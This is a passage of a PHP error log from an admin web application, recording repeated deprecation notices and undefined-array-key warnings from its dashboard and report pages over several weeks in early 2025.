deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 10:08:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 10:08:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 10:31:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 10:31:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 10:31:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 10:47:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 10:47:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 10:50:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 10:50:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 10:50:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 12:04:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 12:04:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 12:04:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 12:49:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 13:02:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 13:02:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 13:02:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 13:02:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 13:02:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [23-Jan-2025 13:02:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [23-Jan-2025 14:31:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 14:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 14:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [23-Jan-2025 16:30:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [23-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 11:59:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 11:59:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 11:59:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 11:59:58 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:33:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 14:33:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 14:33:39 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:51:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 14:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 14:51:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:54:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 14:54:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 14:55:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 15:17:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 15:17:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [24-Jan-2025 16:30:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Jan-2025 16:30:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [24-Jan-2025 16:30:42 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Jan-2025 21:59:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Jan-2025 22:00:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Jan-2025 22:02:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 12:00:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 12:00:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [28-Jan-2025 12:00:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [28-Jan-2025 14:34:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 14:34:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [28-Jan-2025 14:34:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [28-Jan-2025 16:30:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [28-Jan-2025 16:30:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:41:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 00:41:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 00:41:46 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:43:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 00:51:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 00:51:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 00:51:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:53:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 00:53:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 00:55:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:55:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 00:55:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:55:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 00:55:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:55:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 00:57:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [29-Jan-2025 00:57:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [29-Jan-2025 10:59:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 10:59:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 10:59:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 12:01:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 12:01:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 12:01:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 14:31:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 14:31:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 14:31:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 14:59:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 14:59:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 14:59:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 15:01:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 15:46:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 15:46:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 15:46:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 15:47:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 16:30:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 16:30:56 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [29-Jan-2025 17:55:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Jan-2025 17:55:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [29-Jan-2025 17:55:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 11:35:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Jan-2025 11:35:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 11:35:17 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 12:09:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Jan-2025 12:09:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 12:09:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 12:48:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 12:48:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [30-Jan-2025 14:58:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [30-Jan-2025 14:58:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [30-Jan-2025 14:58:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [31-Jan-2025 12:03:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [31-Jan-2025 12:03:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [31-Jan-2025 12:03:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [31-Jan-2025 12:06:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [31-Jan-2025 12:06:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [31-Jan-2025 12:06:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [31-Jan-2025 13:15:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [31-Jan-2025 13:17:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [31-Jan-2025 13:17:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [03-Feb-2025 00:52:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Feb-2025 00:55:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [03-Feb-2025 00:55:53 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [03-Feb-2025 11:40:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [03-Feb-2025 11:40:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [03-Feb-2025 11:40:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [03-Feb-2025 12:33:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Feb-2025 12:18:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [04-Feb-2025 12:18:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [04-Feb-2025 12:18:36 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [05-Feb-2025 15:31:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [05-Feb-2025 15:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [05-Feb-2025 15:31:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Feb-2025 16:22:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Feb-2025 16:22:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Feb-2025 16:22:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 15:26:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 15:26:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 15:26:59 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 17:42:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 17:42:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 17:42:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 17:44:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 17:44:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [18-Feb-2025 18:12:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 23:10:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Feb-2025 23:10:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [18-Feb-2025 23:10:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Feb-2025 14:36:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Feb-2025 14:37:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Feb-2025 14:37:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [19-Feb-2025 19:02:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Feb-2025 19:02:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [19-Feb-2025 19:02:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 